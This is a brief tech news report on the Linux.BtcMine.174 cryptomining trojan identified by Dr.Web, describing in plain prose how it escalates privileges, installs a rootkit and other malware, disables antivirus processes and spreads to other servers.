LINUX MAY FALL some way behind Windows in virus distributors’ eyes due to its smaller install base, but Linux-focused malware does exist, often taking advantage of the sense of complacency its relative rarity brings. But even if you do use some kind of anti-malware software on your Linux system, you’re still at risk from this particularly jerky piece of malware, recently identified by Russian company Dr.Web.
Comprised of over 1,000 lines of code, Linux.BtcMine.174 (the company is better at identifying malware than giving it a headline-friendly name), is particularly malicious thanks to the number of ways it attacks its host computer.
As the name suggests, the main function of the malware is to mine cryptocurrency – in this case Monero – but before it even gets to that point, it has some fun with its Linux host. At the start of the infection, it finds a folder it has write permissions for, so it can copy itself and download additional modules.
It then tries a couple of privilege escalation exploits – including Dirty Cow (now that’s how you name an exploit!) – to obtain root access giving it root permissions and full access to the OS. It then sets itself up as a local daemon and gets the nohup utility if it’s not already there, and downloads and runs a DDoS malware strain called the Bill Gates trojan for good measure.
As it embarks on its main task of mining Monero, Linux.BtcMine.174 is keen to ensure it takes up as much system resource as it possibly can. Not only does it scan and terminate rival cryptocurrency-mining programmes, but it disables any Linux-based antivirus system it recognises along the way, taking down processes named safedog, aegis, yunsuo, clamd, avast, avgd, cmdavd, cmdmgd, drweb-configd, drweb-spider-kmod, esets and xmirrord.
But wait, there’s more! The trojan then adds itself as an autorun entry to various files and downloads and runs a rootkit for good measure. This rootkit has the ability to grab su-command passwords as they’re entered, and hide files for good measure.
The trojan attempts to colonise remote servers connected to by the infected systems, to spread the mayhem further. You can find the SHA1 file hashes for Linux.BtcMine.174 on GitHub if you want to check your system for its footprints. µ
Source : Inquirer